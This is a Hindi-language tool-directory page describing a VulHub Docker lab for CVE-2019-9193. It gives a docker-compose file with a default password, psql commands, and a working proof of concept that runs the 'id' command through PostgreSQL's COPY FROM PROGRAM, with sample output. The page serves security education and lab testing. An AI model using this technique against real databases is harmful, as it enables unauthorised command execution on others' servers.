Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2019-9193byVulHub — # CVE-2019-9193 PostgreSQL के माध्यम से मनमाना कमांड निष्पादन प्रदर्शित करने वाली Docker-आधारित प्रयोगशाला यह Docker-आधारित प्रयोगशाला COPY FROM PROGRAM के माध्यम से CVE-2019-9193 PostgreSQL मनमाना कमांड निष्पादन को प्रदर्शित करती है, जिसमें सुरक्षा परीक्षण और शिक्षा के लिए चरण-दर-चरण PoC (प्रूफ ऑफ कॉन्सेप्ट) शामिल है। | Kitploit
उपकरण/GitHubGitHub/corsisechero/cve-2019-9193byvulhub
भेद्यता विश्लेषणशोषणपेनिट्रेशन टेस्टिंगलर्निंग और शिक्षाडेटाबेस सुरक्षालैब और अभ्यास
GitHubcorsisechero/cve-2019-9193byvulhub

CVE-2019-9193byVulHub

रिपॉजिटरी देखें
51 साल पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →

विवरण

# CVE-2019-9193 PostgreSQL के माध्यम से मनमाना कमांड निष्पादन प्रदर्शित करने वाली Docker-आधारित प्रयोगशाला यह Docker-आधारित प्रयोगशाला COPY FROM PROGRAM के माध्यम से CVE-2019-9193 PostgreSQL मनमाना कमांड निष्पादन को प्रदर्शित करती है, जिसमें सुरक्षा परीक्षण और शिक्षा के लिए चरण-दर-चरण PoC (प्रूफ ऑफ कॉन्सेप्ट) शामिल है।

साझा करें

CVE-2019-9193byVulHub


PostgreSQL में एडमिन विशेषाधिकारों के साथ मनमाना कमांड निष्पादन (CVE-2019-9193)

विवरण

PostgreSQL एक शक्तिशाली ओपन-सोर्स रिलेशनल डेटाबेस प्रबंधन प्रणाली है। 9.3 से 11 तक के संस्करणों में मौजूद एक कमजोरी प्रशासकों या COPY TO/FROM PROGRAM विशेषाधिकार वाले उपयोगकर्ताओं को सिस्टम पर मनमाने कमांड निष्पादित करने की अनुमति देती है।

संदर्भ:

  • GitHub - Vulhub - PostgreSQL CVE-2019-9193
  • Greenwolf Security - PostgreSQL 9.3 पर प्रमाणित मनमाना कमांड निष्पादन - नवीनतम

पर्यावरण सेटअप

Docker Compose फ़ाइल ()

docker-compose.yml

निम्नलिखित सामग्री के साथ एक docker-compose.yml फ़ाइल बनाएँ:

root@kitploit:~
version: '2'
services:
 postgres:
   image: vulhub/postgres:10.7
   ports:
    - "5432:5432"
   environment:
    - POSTGRES_PASSWORD=postgres

PostgreSQL कंटेनर प्रारंभ करना

कंटेनर को निम्नलिखित कमांड से चलाएँ:

root@kitploit:~
docker compose up -d

सत्यापित करें कि कंटेनर चल रहा है:

root@kitploit:~
docker ps

आउटपुट में PostgreSQL कंटेनर को पोर्ट 5432 पर सुनते हुए दिखाना चाहिए।


कंटेनर में प्रवेश किए बिना एक्सप्लॉइट निष्पादन

1. PostgreSQL क्लाइंट स्थापित करना

यदि आपके पास psql क्लाइंट स्थापित नहीं है, तो आप इसे इसके साथ कर सकते हैं:

  • Kali:
    root@kitploit:~
    apt-get install postgresql-client
    

2. कमांड लाइन से डेटाबेस से कनेक्शन

Kali से सीधे डेटाबेस से जुड़ें:

root@kitploit:~
psql -h localhost -p 5432 -U postgres

आपसे पासवर्ड माँगा जाएगा, दर्ज करें:

root@kitploit:~
postgres

3. PoC (Proof of Concept) का निष्पादन

PostgreSQL कंसोल से कनेक्ट होने के बाद, कमजोरी का फायदा उठाने के लिए निम्नलिखित कमांड चलाएँ:

root@kitploit:~
-- Elimina la tabella se esiste
DROP TABLE IF EXISTS cmd_exec;

-- Crea una nuova tabella per memorizzare l'output del comando
CREATE TABLE cmd_exec(cmd_output text);

-- Esegui il comando 'id' tramite la funzione COPY FROM PROGRAM
COPY cmd_exec FROM PROGRAM 'id';

-- Visualizza l'output del comando
SELECT * FROM cmd_exec;

4. कमांड लाइन से कमांड निष्पादन (बिना इंटरैक्टिव शेल)

आप सब कुछ सीधे कमांड लाइन से चला सकते हैं:

root@kitploit:~
psql -h localhost -p 5432 -U postgres -c "DROP TABLE IF EXISTS cmd_exec; CREATE TABLE cmd_exec(cmd_output text); COPY cmd_exec FROM PROGRAM 'id'; SELECT * FROM cmd_exec;"

आउटपुट सत्यापन

यदि एक्सप्लॉइट सफल रहा है, तो आपको इसी तरह का आउटपुट दिखना चाहिए:

root@kitploit:~
       cmd_output
-------------------------
 uid=999(postgres) gid=999(postgres) groups=999(postgres)
(1 row)

PostgreSQL कंसोल से बाहर निकलना

बाहर निकलने के लिए \q दबाएँ:

root@kitploit:~
\q

सुरक्षा नोट्स

यह कमजोरी प्रशासनिक विशेषाधिकारों के साथ मनमाने कमांड निष्पादन की अनुमति देती है। इसे केवल नियंत्रित वातावरण में और अध्ययन या सत्यापन के उद्देश्य से उपयोग करें। अनधिकृत सिस्टम पर इस कमजोरी का शोषण करना अवैध है।

टूल डाउनलोड करें